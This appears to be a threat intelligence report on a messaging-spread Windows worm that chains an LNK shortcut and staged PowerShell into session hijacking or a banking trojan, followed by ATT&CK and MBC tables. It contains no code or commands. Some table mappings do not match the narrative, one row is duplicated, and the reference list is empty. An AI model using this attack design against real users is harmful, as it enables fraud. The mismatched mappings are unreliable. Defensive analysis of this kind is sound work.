EXECUTIVE SUMMARY:
This campaign leverages web-based instant messaging sessions to deliver a self-propagating Windows worm that targets desktop users in a specific national financial market. Attackers distribute a compressed archive that contains a crafted shortcut file which, when opened on a computer, executes an obfuscated command that decodes and runs a staged PowerShell script. The first scripted stage uses a legitimate system process as cover to fetch a second-stage command from remote infrastructure and attempts to alter local security controls to reduce detection. Depending on runtime checks, the chain either installs a browser automation component that can take control of an authenticated web messaging session to forward the same malicious archive to contacts, enabling contact-based propagation, or it installs a feature-rich banking trojan tailored to monitor and interact with active browser sessions for financial and exchange activity. Affected systems are desktop operating environments where users access the messaging web client and open archive attachments on a computer.
The technical chain is multi-stage and intentionally obfuscated to frustrate detection and analysis. The initial artifact is a compressed archive delivered through a trusted messaging contact; inside is a Windows LNK shortcut whose target field contains an obfuscated command that reconstructs and executes a Base64-encoded PowerShell payload. The first PowerShell stage covertly spawns a legitimate system process and uses it to download a second-stage PowerShell command from remote infrastructure. The second stage contains comments and commands that aim to modify local defenses, specifically indicating goals to add exclusions and to alter elevation controls. The actor performs environment and anti-analysis checks and then selectively delivers one of two payloads: a widely used browser automation framework plus matching driver to control an already-authenticated web messaging session and reproduce the malicious archive to contacts, or a managed .NET banking trojan that monitors active browser sessions and only activates when traffic matches targeted financial and exchange domains.
The campaign combines trusted-contact social engineering, multi-stage script execution, selective payload staging, and browser session manipulation to pursue financially motivated objectives while enabling efficient self-propagation through contacts. Observed impacts include widespread obfuscated PowerShell execution across many endpoints, attempts to alter local security controls to reduce detection, installation of browser automation tooling that can hijack authenticated messaging sessions to propagate the worm, and conditional deployment of a banking trojan on hosts that match financial targeting criteria. The design balances stealth and spread obfuscation and use of legitimate processes and tools reduce detection probability, while session hijacking and delivery via trusted contacts increase user execution likelihood. In the broader threat landscape, this campaign aligns with financially motivated actors that prioritize targeted banking fraud, use living-off-the-land script execution, and leverage legitimate automation tooling to extend capabilities and complicate detection and analysis.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub Technique Name |
| Resource Development | T1588.002 | Obtain Capabilities | Tool |
| T1587.001 | Develop Capabilities | Malware | |
| T1583.001 | Acquire Infrastructure | Domains | |
| Initial Access | T1195.002 | Supply Chain Compromise | Compromise Software Supply Chain |
| Execution | T1204.002 | User Execution | Malicious File |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1036.005 | Masquerading | Match Legitimate Name or Location |
| T1027.010 | Obfuscated Files or Information | Command Obfuscation | |
| Credential Access | T1552.001 | Unsecured Credentials | Credentials In Files |
| T1555.003 | Credentials from Password Stores | Credentials from Web Browsers | |
| Collection | T1005 | Data from Local System | - |
| T1560.001 | Archive Collected Data | Archive via Utility | |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | - |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
| Initial Access | E1204 | User Execution |
| Execution | E1059 | Command and Scripting Interpreter |
| Persistence | F0012 | Registry Run Keys |
| F0013 | Scheduled Tasks | |
| Defense Evasion | E1027 | Obfuscated Files/Information |
| F0006 | Indicator Blocking | |
| Discovery | E1082 | System Information Discovery |
| Credential Access | E1055 | Process Injection |
| Collection | E1083 | File/Directory Discovery |
| E1083 | File/Directory Discovery | |
| Command & Control | C0002 | HTTP Communication |
| Exfiltration | E1020 | Automated Exfiltration |
| Impact | B0016 | Compromise Data Integrity |
REFERENCES:
The following reports contain further technical details: